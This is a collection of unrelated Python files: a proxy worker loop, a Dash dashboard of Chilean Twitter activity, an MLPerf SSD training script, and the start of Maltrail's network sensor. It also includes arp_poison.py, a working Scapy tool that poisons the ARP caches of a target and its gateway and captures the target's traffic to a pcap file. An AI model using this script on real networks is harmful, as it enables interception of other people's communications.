if linode_proxies[proxy_idx].get_status() != "running":
temp_list.append(proxy_idx)
sleep(0.2)
nodes_to_ping = temp_list
print()
while not entry_q.full():
sleep(0.2)
os.chdir(dirname)
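        # Stagger worker start-up with a small random delay (shorter when every
        # worker has its own Linode proxy), presumably to avoid opening all
        # connections to YouTube at the same instant.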
for i in range(n_workers):
if len(linode_proxies) > 0:
linode_proxies[i] = validate_linode_proxy(linode_proxies[i])
seconds = randint(0, 1)
else:
seconds = randint(1, 6)
workers[i].start()
sleep(seconds)
while workers_alive(workers):
sleep(0.2)
except KeyboardInterrupt:
eprint("\n[CLEANUP]: Interrupted, cleaning up...")
cleanup(workers, linode_proxies)
if entry_getter.is_alive():
print(
"[CLEANUP]: Terminating queue worker {}".format(
entry_getter.pid
)
)
entry_getter.terminate()
return 1
print("[INFO]: All done!")
cleanup(workers, linode_proxies)
return 0
|
app.py
|
import warnings
import dash
import dash_core_components as dcc
import dash_html_components as html
warnings.filterwarnings('ignore')
from dash.dependencies import Input, Output
from multiprocessing import Process, Queue
from utils import read_mongo, json_pandas
from main import get_keywords
from utils_app import get_tpm, create_graph, create_wc, get_username_list, create_wc2
from npl_utils import init_counter, process
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# global variables
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
dir_noticias = 'data/Noticieros Twitter.csv'
dir_politicos = 'data/Politicos-Twitter.csv'
keywords = get_keywords()[:50]
noticieros = get_username_list(dir_noticias)
politicos = get_username_list(dir_politicos)
time_interval = 30 # seconds
# dataframe with starting database
df = json_pandas(
read_mongo('dbTweets', 'tweets_chile',
query_fields={"dateTweet": 1, "tweet": 1, "screenName": 1},
json_only=True, num_limit=10 ** 5)
)
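# Initial snapshot used to seed the dashboard: up to 10**5 tweets with only the
# fields the plots need.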
twiterator = map(process, df['tweet'])
word_counter = init_counter(twiterator)
tpm_chile = get_tpm(df.copy(), keywords)
datetime_chile = tpm_chile['All'].index.max()
graph_chile = create_graph(tpm_chile, keywords[:9])
#wc_chile = create_wc(tpm_chile, keywords)
wc_chile = create_wc2(word_counter)
q_chile = Queue()
tpm_prensa = get_tpm(df.loc[df['screenName'].isin(noticieros)].copy(), keywords)
datetime_prensa = tpm_prensa['All'].index.max()
graph_prensa = create_graph(tpm_prensa, keywords[:9])
wc_prensa = create_wc(tpm_prensa, keywords)
q_prensa = Queue()
tpm_politicos = get_tpm(df.loc[df['screenName'].isin(politicos)].copy(), keywords)
datetime_politicos = tpm_politicos['All'].index.max()
graph_politicos = create_graph(tpm_politicos, keywords[:9])
wc_politicos = create_wc(tpm_politicos, keywords)
q_politicos = Queue()
max_length = 100 # maximum number of points to plot
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# layout
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
fig_tpm_chile = dcc.Graph(figure=graph_chile, id='plot-tweets-chile')
fig_tpm_prensa = dcc.Graph(figure=graph_prensa, id='plot-tweets-prensa')
fig_tpm_politicos = dcc.Graph(figure=graph_politicos, id='plot-tweets-politicos')
fig_wc_chile = dcc.Graph(figure=wc_chile, id='word-cloud-chile')
fig_wc_prensa = dcc.Graph(figure=wc_prensa, id='word-cloud-prensa')
fig_wc_politicos = dcc.Graph(figure=wc_politicos, id='word-cloud-politicos')
# Dash object
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
server = app.server
# CACHE_CONFIG = {
# 'CACHE_TYPE': 'filesystem',
# 'CACHE_DIR': 'cache-directory'
# }
# cache = Cache()
# cache.init_app(app.server, config=CACHE_CONFIG)
# layout for Dash object
app.layout = html.Div([
# ======== PRESENTACION PAGINA ======== #
html.H1(children='¡Bienvenid@ al DashBoard del CeMAS!', style={'textAlign': 'center'}),
html.H5(children='''
En esta página usted tiene acceso a distintas visualizaciones referentes a la situación
actual de Chile.
''', style={'textAlign': 'center'}),
html.H6(children="El objetivo es que la ciudadanía tenga un fácil acceso a lo que estan diciendo los actores "
"políticos, los medios de comunicación y la ciudadanía",
style={'textAlign': 'center'}),
# ======== TABS PRENSA, CHILE, POLITICOS ======== #
dcc.Tabs(id='tabs-graphs', value='tab-chile', children=[
dcc.Tab(label='Prensa', id='graphs-prensa', value='tab-prensa', children=html.Div([
html.H6(
children="Los distintos medios de comunicación chilenos utilizan Twitter. En tiempo real, se puede "
"ver la cantidad de Tweets realizadas por la prensa:",
style={'textAlign': 'center'}),
html.Div(fig_tpm_prensa, style={'textAlign': 'center'}),
html.H6("En donde las palabras que más usadas en sus tweets son:",
style={'textAlign': 'center'}),
html.Div(fig_wc_prensa, style={'textAlign': 'center', 'display': 'flex', 'justify-content': 'center'})
])
),
dcc.Tab(label='Chile', id='graphs-chile', value='tab-chile', children=html.Div([
html.H6(
children="Los chilenos también usan Twitter. En tiempo real, se puede ver la frecuencia en que la "
"gente utiliza la red social para expresarse:",
style={'textAlign': 'center'}),
html.Div(fig_tpm_chile, style={'textAlign': 'center'}),
html.H6("Las palabras que más usan los usuarios de twitter son:",
style={'textAlign': 'center'}),
html.Div(fig_wc_chile, style={'textAlign': 'center', 'display': 'flex', 'justify-content': 'center'}),
])
),
dcc.Tab(label='Politicos', id='graphs-politicos', value='tab-politicos', children=html.Div([
html.H6(
children="Twitter se ha vuelto una plataforma importante para los políticos de hoy. La frecuencia "
"con la que publican en Twitter es:",
style={'textAlign': 'center'}),
html.Div(fig_tpm_politicos, style={'textAlign': 'center'}),
html.H6("Las palabras que más usan los políticos para expresarse en Twitter son:",
style={'textAlign': 'center'}),
html.Div(fig_wc_politicos, style={'textAlign': 'center', 'display': 'flex', 'justify-content': 'center'}),
])
),
]),
# ======== hidden signal value ======== #
html.Div(id='signal', style={'display': 'none'}),
# ======== time interval ======== #
dcc.Interval(id='interval',
interval=time_interval * 1000, # in milliseconds
n_intervals=0),
])
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# functions
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# @cache.memoize()
# def global_store(num_limit=None):
# """
# Read data from mongo with cache.
# """
# return read_mongo('dbTweets', 'tweets_chile',
# query_fields={"dateTweet": 1, "tweet": 1, "screenName": 1},
# json_only=True, num_limit=num_limit)
def multiprocessing_wc(tpm, kws, queue, test_without_wc=True):
"""
    Creates the word-cloud figure in a separate process and puts it on the given queue.
"""
queue.put(create_wc(tpm, kws))
def multiprocessing_wc2(counter, queue):
"""
Same as multiprocessing_wc but with the new create_wc that
receives a counter rather than a dataframe
:param counter: Counter() instance
:param queue: Queue() instance
"""
queue.put(create_wc2(counter))
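# The word-cloud figures are built in separate processes and handed back
# through a Queue, presumably so the heavy rendering does not block the Dash
# callback thread.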
def update_counter(data_frame):
twiterator = map(process, data_frame['tweet'])
return init_counter(twiterator)
def update_tpm(data_frame, kws, tpm, datetime, return_changed=True):
"""
updates tweets-per-minute with new data_frame.
Params:
        data_frame (pd.DataFrame): data of tweets.
        kws (str[:]): list of keywords.
        tpm (dict(int[:])): dictionary with tweets-per-minute for different keywords.
        datetime (Datetime): last datetime in tpm.
    Returns:
        tpm_changed (bool): whether tpm changed during the update.
tpm (dict(int[:])): new dictionary of tweets-per-minute.
new_datetime (Datetime): new datetime value.
"""
tpm_changed = False
    new_tpm = get_tpm(data_frame, kws)
for key in (kws + ['All']):
# keep only new values of tweets_per_minute
new_tpm[key] = new_tpm[key].loc[new_tpm[key].index > datetime]
        tpm_changed = tpm_changed or len(new_tpm[key].index) > 0
tpm[key] = tpm[key].append(new_tpm[key])
if len(tpm[key].index) > max_length: # check tpm array max length
tpm[key] = tpm[key].iloc[-max_length:]
new_datetime = tpm['All'].index.max()
if return_changed is True:
return tpm_changed, tpm, new_datetime
else:
return tpm, new_datetime
def update_tpm_users(data_frame, users, keywords, tpm, datetime, return_changed=True):
"""
updates tweets-per-minute with new data_frame for tweets that come from certain users.
Params:
data_frame (pd.DataFrame): data of tweets.
        users (str[:]): list of usernames used to filter data_frame.
        keywords (str[:]): list of keywords.
        tpm (dict(int[:])): dictionary with tweets-per-minute for different keywords.
datetime (Datetime): last datetime in tpm.
Returns:
        tpm_changed (bool): whether tpm changed during the update.
tpm (dict(int[:])): new dictionary of tweets-per-minute.
new_datetime (Datetime): new datetime value.
"""
tpm_changed = False
df_user = data_frame.loc[data_frame['screenName'].isin(users)]
new_tpm = get_tpm(df_user, keywords)
for key in (keywords + ['All']):
# keep only new values of tweets_per_minute
new_tpm[key] = new_tpm[key].loc[new_tpm[key].index > datetime]
        tpm_changed = tpm_changed or len(new_tpm[key].index) > 0
tpm[key] = tpm[key].append(new_tpm[key])
if len(tpm[key].index) > max_length: # check tpm array max length
tpm[key] = tpm[key].iloc[-max_length:]
new_datetime = tpm['All'].index.max()
if return_changed is True:
return tpm_changed, tpm, new_datetime
else:
return tpm, new_datetime
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# callbacks
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
@app.callback(
Output('signal', 'children'),
[Input('interval', 'n_intervals')]
)
def compute_data(_):
"""
    Callback triggered after every "time_interval". It reads the data from mongo and returns it.
"""
return read_mongo('dbTweets', 'tweets_chile',
query_fields={"dateTweet": 1, "tweet": 1, "screenName": 1},
json_only=True, num_limit=10**5)
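# The JSON returned above is stored in the hidden 'signal' div and fans the
# same mongo snapshot out to the three tab callbacks below.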
# tweets per minute callbacks
@app.callback(
[Output('plot-tweets-chile', 'figure'), Output('word-cloud-chile', 'figure')],
[Input('signal', 'children')]
)
def update_graphs_chile(data):
"""
When compute_data() returns the data read from mongo. The plot and wordcloud of "tab-chile" will be updated.
"""
global tpm_chile, datetime_chile, wc_chile, graph_chile
tpm_changed, tpm_chile, datetime_chile = \
update_tpm(json_pandas(data).copy(), keywords, tpm_chile, datetime_chile)
if tpm_changed is True:
#p = Process(target=multiprocessing_wc, args=(tpm_chile, keywords, q_chile))
#p.start()
graph_chile = create_graph(tpm_chile, keywords[:9])
#wc_chile = q_chile.get()
#p.join()
word_counter = update_counter(json_pandas(data).copy())
p2 = Process(target=multiprocessing_wc2, args=(word_counter, q_chile))
p2.start()
wc_chile = q_chile.get()
p2.join()
return graph_chile, wc_chile
@app.callback(
[Output('plot-tweets-prensa', 'figure'), Output('word-cloud-prensa', 'figure')],
[Input('signal', 'children')]
)
def update_graphs_prensa(data):
"""
When compute_data() returns the data read from mongo. The plot and wordcloud of "tab-prensa" will be updated.
"""
global tpm_prensa, datetime_prensa, wc_prensa, graph_prensa
tpm_changed, tpm_prensa, datetime_prensa = \
update_tpm_users(json_pandas(data).copy(), noticieros, keywords, tpm_prensa, datetime_prensa)
if tpm_changed is True:
p = Process(target=multiprocessing_wc, args=(tpm_prensa, keywords, q_prensa))
p.start()
graph_prensa = create_graph(tpm_prensa, keywords[:9])
wc_prensa = q_prensa.get()
p.join()
return graph_prensa, wc_prensa
@app.callback(
[Output('plot-tweets-politicos', 'figure'), Output('word-cloud-politicos', 'figure')],
[Input('signal', 'children')]
)
def update_graphs_politicos(data):
"""
When compute_data() returns the data read from mongo. The plot and wordcloud of "tab-politicos" will be updated.
"""
global tpm_politicos, datetime_politicos, wc_politicos, graph_politicos
tpm_changed, tpm_politicos, datetime_politicos = \
update_tpm_users(json_pandas(data).copy(), politicos, keywords, tpm_politicos, datetime_politicos)
if tpm_changed is True:
p = Process(target=multiprocessing_wc, args=(tpm_politicos, keywords, q_politicos))
p.start()
graph_politicos = create_graph(tpm_politicos, keywords[:9])
wc_politicos = q_politicos.get()
p.join()
return graph_politicos, wc_politicos
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# main
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
if __name__ == '__main__':
app.run_server(port=3000, debug=True)
|
arp_poison.py
|
'''
Made By Sai Harsha Kottapalli
Tested on python3
About : ARP poisoning
Use : convince the target and the gateway to route their traffic through this host.
Note : the local host must forward packets between the gateway IP address and the target IP address
Kali: $echo 1 > /proc/sys/net/ipv4/ip_forward
mac : $sudo sysctl -w net.inet.ip.forwarding=1
Check with $arp -a
'''
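# Example invocation (illustrative only; the interface and addresses depend on
# your own network):
#   sudo python3 arp_poison.py -i eth0 -ip 192.168.1.50 -g 192.168.1.1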
import os
import sys
import signal
import argparse
import time
from threading import *
from scapy.all import *
def tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac):
# send ARP packets with correct MAC address
send(ARP(op=2, psrc=gate_ip, pdst=tgt_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gate_mac), count=5)
send(ARP(op=2, psrc=tgt_ip, pdst=gate_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=tgt_mac), count=5)
#main thread exits
    os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip):
#response after sending ARP request
responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2, retry=10)#send and receive
# return MAC address from response
for s, r in responses:
return r[Ether].src
return None
def tgt_poisoning(gate_ip, gate_mac, tgt_ip, tgt_mac):
tgt_poisoning = ARP()
tgt_poisoning.op = 2 # opcode 2 (reply)
tgt_poisoning.psrc = gate_ip
tgt_poisoning.pdst = tgt_ip
tgt_poisoning.hwdst = tgt_mac
gate_poison = ARP() #gateway poisoning
gate_poison.op = 2
gate_poison.psrc = tgt_ip
    gate_poison.pdst = gate_ip
    gate_poison.hwdst = gate_mac
print("[*]ARP Poisoning starting....")
while True:
try:
send(tgt_poisoning)
send(gate_poison)
time.sleep(2)
except KeyboardInterrupt:
tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac)
print("[*]ARP poisoning done.")
def main():
parser = argparse.ArgumentParser(description = "ARP poisoning")
parser.add_argument("-i",action="store",dest="interface",help="interface")
parser.add_argument("-ip",action="store",dest="ip",help="target ip address")
parser.add_argument("-g",action="store",dest="gateway",help="gateway ip address")
results = parser.parse_args()
interface = results.interface
tgt_ip = results.ip #target ip
gate_ip = results.gateway #gateway ip
if interface is None or tgt_ip is None or gate_ip is None:
parser.print_help()
exit(0)
count_packets = 1000 # sniff these many packets
print("[*]Setting {0} and {1}".format(interface,output))
conf.iface = interface # set up the interface
conf.verb = 0 # turn off output
gate_mac = get_mac(gate_ip) # gateway's MAC address
if gate_mac is not None:
print("[*] Gateway {0} is at {1}".format(gate_ip, gate_mac))
else:
print("[-]Could not get Gateway MAC address. Exit..")
sys.exit(0)
tgt_mac = get_mac(tgt_ip)
if tgt_mac is not None:
print("[*]Target's ip : {0} and MAC : {1}".format(tgt_ip, tgt_mac))
    else:
        print("[-]Could not get Target MAC address. Exit..")
        sys.exit(0)
#poisoning
t = Thread(target=tgt_poisoning, args=(gate_ip, gate_mac, tgt_ip, tgt_mac))
t.start()
try:
print("[*]Packets to be sniffed : {0}".format(count_packets))
bpf_filter = "ip host {0}".format(tgt_ip) # packets from the target IP
packets = sniff(count=count_packets, filter=bpf_filter, iface=interface)
# write packets
wrpcap("arper.pcap", packets)
# restore network
tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac)
except KeyboardInterrupt:
# restore network
tgt_restore(gate_ip, gate_mac, tgt_ip, tgt_mac)
sys.exit(0)
if __name__ == "__main__":
main()
|
ssd_main_eval_fix.py
|
# Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training script for SSD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import multiprocessing
import sys
import threading
from absl import app
import tensorflow.compat.v1 as tf
from REDACTED.mlperf.submissions.training.v1_0.models.mlp_log import mlp_log
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import coco_metric
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import dataloader
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import ssd_constants
from REDACTED.mlperf.submissions.training.v1_0.models.ssd import ssd_model
from REDACTED.mlperf.submissions.training.v1_0.models.util import train_and_eval_runner
# copybara:strip_begin
from REDACTED.REDACTED.multiprocessing import REDACTEDprocess
# copybara:strip_end
tf.flags.DEFINE_string(
'resnet_checkpoint',
'/REDACTED/mb-d/home/tpu-perf-team/ssd_checkpoint_mlperf',
'Location of the ResNet checkpoint to use for model '
'initialization.')
tf.flags.DEFINE_string('hparams', '',
'Comma separated k=v pairs of hyperparameters.')
tf.flags.DEFINE_integer(
'num_shards', default=8, help='Number of shards (TPU cores) for '
'training.')
tf.flags.DEFINE_integer('train_batch_size', 64, 'training batch size')
tf.flags.DEFINE_integer('eval_batch_size', 1, 'evaluation batch size')
tf.flags.DEFINE_integer('eval_samples', 5000, 'The number of samples for '
'evaluation.')
tf.flags.DEFINE_integer(
'iterations_per_loop', 1000, 'Number of iterations per TPU training loop')
tf.flags.DEFINE_string(
'training_file_pattern',
'REDACTEDtrain*',
'Glob for training data files (e.g., COCO train - minival set)')
tf.flags.DEFINE_string(
'validation_file_pattern',
'REDACTEDval*',
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
tf.flags.DEFINE_bool(
'use_fake_data', False,
'Use fake data to reduce the input preprocessing overhead (for unit tests)')
tf.flags.DEFINE_string(
'val_json_file',
'REDACTEDinstances_val2017.json',
'COCO validation JSON containing golden bounding boxes.')
tf.flags.DEFINE_integer('num_examples_per_epoch', 118287,
'Number of examples in one epoch')
tf.flags.DEFINE_integer('num_epochs', 64, 'Number of epochs for training')
tf.flags.DEFINE_multi_integer(
'input_partition_dims',
default=None,
help=('Number of partitions on each dimension of the input. Each TPU core'
' processes a partition of the input image in parallel using spatial'
' partitioning.'))
tf.flags.DEFINE_integer(
'dataset_threadpool_size', default=48,
    help=('The size of the private threadpool used by the dataset.'))
tf.flags.DEFINE_bool('run_cocoeval', True, 'Whether to run cocoeval')
tf.flags.DEFINE_integer(
'bfloat16_replica_threshold',
default=128,
help=('Threshold for enabling bfloat16 for cross replica sum.'))
FLAGS = tf.flags.FLAGS
_STOP = -1
def construct_run_config(iterations_per_loop):
"""Construct the run config."""
# Parse hparams
hparams = ssd_model.default_hparams()
hparams.parse(FLAGS.hparams)
return dict(
hparams.values(),
num_shards=FLAGS.num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
resnet_checkpoint=FLAGS.resnet_checkpoint,
val_json_file=FLAGS.val_json_file,
model_dir=FLAGS.model_dir,
iterations_per_loop=iterations_per_loop,
steps_per_epoch=FLAGS.num_examples_per_epoch // FLAGS.train_batch_size,
eval_samples=FLAGS.eval_samples,
transpose_input=False if FLAGS.input_partition_dims is not None else True,
use_spatial_partitioning=True
if FLAGS.input_partition_dims is not None else False,
dataset_threadpool_size=FLAGS.dataset_threadpool_size
)
# copybara:strip_begin
def REDACTED_predict_post_processing():
"""REDACTED batch-processes the predictions."""
q_in, q_out = REDACTEDprocess.get_user_data()
predict_post_processing(q_in, q_out)
# copybara:strip_end
def predict_post_processing(q_in, q_out):
"""Run post-processing on CPU for predictions."""
coco_gt = coco_metric.create_coco(FLAGS.val_json_file, use_cpp_extension=True)
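  # Consume (train_step, detections) work items until the _STOP sentinel
  # arrives; each result pushed to q_out is (train_step, COCO metrics).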
current_step, predictions = q_in.get()
while current_step != _STOP and q_out is not None:
q_out.put((current_step,
coco_metric.compute_map(
predictions,
coco_gt,
use_cpp_extension=True,
nms_on_tpu=True)))
current_step, predictions = q_in.get()
# converged_epoch marks the epoch at which convergence happens.
# evals_completed is a large enough array whose entries are set
# to True when an eval finishes.
converged_epoch = 0
evals_completed = [False] * 50
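# NOTE: the (epoch // 5) - 1 indexing below assumes an eval runs every 5
# epochs; 50 slots therefore cover up to 250 epochs.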
def main(argv):
del argv # Unused.
global converged_epoch
converged_epoch = 0
params = construct_run_config(FLAGS.iterations_per_loop)
params['batch_size'] = FLAGS.train_batch_size // FLAGS.num_shards
params['bfloat16_replica_threshold'] = FLAGS.bfloat16_replica_threshold
params['first_lr_drop_epoch'] = ssd_constants.FIRST_LR_DROP_EPOCH * (
1 + params['drop_epoch_factor'] / 10)
params['second_lr_drop_epoch'] = ssd_constants.SECOND_LR_DROP_EPOCH * (
1 + params['drop_epoch_factor'] / 10)
input_partition_dims = FLAGS.input_partition_dims
train_steps = FLAGS.num_epochs * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
eval_steps = int(math.ceil(FLAGS.eval_samples / FLAGS.eval_batch_size))
runner = train_and_eval_runner.TrainAndEvalRunner(FLAGS.iterations_per_loop,
train_steps, eval_steps,
FLAGS.num_shards)
mlp_log.mlperf_print(key='cache_clear', value=True)
mlp_log.mlperf_print(key='init_start', value=None)
mlp_log.mlperf_print('global_batch_size', FLAGS.train_batch_size)
mlp_log.mlperf_print('opt_base_learning_rate', params['base_learning_rate'])
mlp_log.mlperf_print(
'opt_learning_rate_decay_boundary_epochs',
[params['first_lr_drop_epoch'], params['second_lr_drop_epoch']])
mlp_log.mlperf_print('opt_weight_decay', params['weight_decay'])
mlp_log.mlperf_print(
'model_bn_span', FLAGS.train_batch_size // FLAGS.num_shards *
params['distributed_group_size'])
batch_size = params['batch_size'] * params['num_shards']
lr_warmup_factor = 0
mlp_log.mlperf_print('opt_learning_rate_warmup_factor', lr_warmup_factor)
steps_per_epoch = params['num_examples_per_epoch'] / batch_size
params['lr_warmup_step'] = int(params['lr_warmup_epoch'] * steps_per_epoch)
mlp_log.mlperf_print(
'opt_learning_rate_warmup_steps', params['lr_warmup_step'])
mlp_log.mlperf_print('max_samples', ssd_constants.NUM_CROP_PASSES)
mlp_log.mlperf_print('train_samples', FLAGS.num_examples_per_epoch)
mlp_log.mlperf_print('eval_samples', FLAGS.eval_samples)
mlp_log.mlperf_print('gradient_accumulation_steps', 1)
train_input_fn = dataloader.SSDInputReader(
FLAGS.training_file_pattern,
params['transpose_input'],
is_training=True,
use_fake_data=FLAGS.use_fake_data,
params=params)
eval_input_fn = dataloader.SSDInputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
distributed_eval=True,
count=eval_steps * FLAGS.eval_batch_size,
params=params)
def init_fn():
tf.train.init_from_checkpoint(params['resnet_checkpoint'], {
'resnet%s/' % ssd_constants.RESNET_DEPTH:
'resnet%s/' % ssd_constants.RESNET_DEPTH,
})
runner.initialize(train_input_fn, eval_input_fn,
functools.partial(ssd_model.ssd_model_fn,
params), FLAGS.train_batch_size,
FLAGS.eval_batch_size, input_partition_dims, init_fn)
mlp_log.mlperf_print('init_stop', None)
mlp_log.mlperf_print('run_start', None)
if FLAGS.run_cocoeval:
# copybara:strip_begin
q_in, q_out = REDACTEDprocess.get_user_data()
processes = [
REDACTEDprocess.Process(target=REDACTED_predict_post_processing) for _ in range(4)
]
# copybara:strip_end_and_replace_begin
# q_in = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# q_out = multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE)
# processes = [
# multiprocessing.Process(
# target=predict_post_processing, args=(q_in, q_out))
# for _ in range(self.num_multiprocessing_workers)
# ]
# copybara:replace_end
for p in processes:
p.start()
def log_eval_results_fn():
"""Print out MLPerf log."""
global evals_completed
global converged_epoch
result = q_out.get()
success = False
while result[0] != _STOP:
if not success:
steps_per_epoch = (
FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
epoch = (result[0] + FLAGS.iterations_per_loop) // steps_per_epoch
mlp_log.mlperf_print(
'eval_accuracy',
result[1]['COCO/AP'],
metadata={'epoch_num': epoch})
mlp_log.mlperf_print('eval_stop', None, metadata={'epoch_num': epoch})
# Mark this eval as completed
evals_completed[(epoch // 5) - 1] = True
if result[1]['COCO/AP'] > ssd_constants.EVAL_TARGET:
# Moving this to after the check that all evals up to the
# converging one have finished.
# success = True
converged_epoch = epoch
# Once we have converged, we check that all the evals up to that
# epoch have completed.
if converged_epoch > 0:
for ep in range(5, converged_epoch + 1, 5):
if not evals_completed[(ep // 5) - 1]:
print('Converged but have not evaluated yet: ', ep)
break
if ep == converged_epoch:
print('Converged and evaluated all ', len(evals_completed))
success = True
mlp_log.mlperf_print(
'run_stop', None, metadata={'status': 'success'})
result = q_out.get()
if not success:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'abort'})
log_eval_result_thread = threading.Thread(target=log_eval_results_fn)
log_eval_result_thread.start()
def eval_init_fn(cur_step):
"""Executed before every eval."""
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_start',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
mlp_log.mlperf_print(
'eval_start',
None,
metadata={
'epoch_num': epoch + FLAGS.iterations_per_loop // steps_per_epoch
})
def eval_finish_fn(cur_step, eval_output, _):
steps_per_epoch = FLAGS.num_examples_per_epoch // FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_stop',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': FLAGS.iterations_per_loop // steps_per_epoch
})
if FLAGS.run_cocoeval:
q_in.put((cur_step, eval_output['detections']))
runner.train_and_eval(eval_init_fn, eval_finish_fn)
if FLAGS.run_cocoeval:
for _ in processes:
q_in.put((_STOP, None))
for p in processes:
try:
p.join(timeout=10)
except Exception: # pylint: disable=broad-except
pass
q_out.put((_STOP, None))
log_eval_result_thread.join()
# Clear out all the queues to avoid deadlock.
while not q_out.empty():
q_out.get()
while not q_in.empty():
q_in.get()
if __name__ == '__main__':
# copybara:strip_begin
user_data = (multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE),
multiprocessing.Queue(maxsize=ssd_constants.QUEUE_SIZE))
in_compile_test = False
for arg in sys.argv:
if arg == '--xla_jf_exit_process_on_compilation_success=true':
in_compile_test = True
break
if in_compile_test:
# Exiting from XLA's C extension skips REDACTEDprocess's multiprocessing clean
# up. Don't use REDACTED process when xla is in compilation only mode.
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
else:
with REDACTEDprocess.main_handler(user_data=user_data):
tf.logging.set_verbosity(tf.logging.INFO)
app.run(main)
# copybara:strip_end
# copybara:insert tf.logging.set_verbosity(tf.logging.INFO)
# copybara:insert app.run(main)
|
sensor.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2017 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import core.versioncheck
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import inet_ntoa6
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import load_trails
from core.enums import BLOCK_MARKER
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import LOCALHOST_IP
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import trails
from core.settings import VALID_DNS_CHARS
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_KEYWORDS
from core.update import update_ipcat
from core.update import update_trails
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = {}
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_quit = threading.Event()
_subdomains = {}
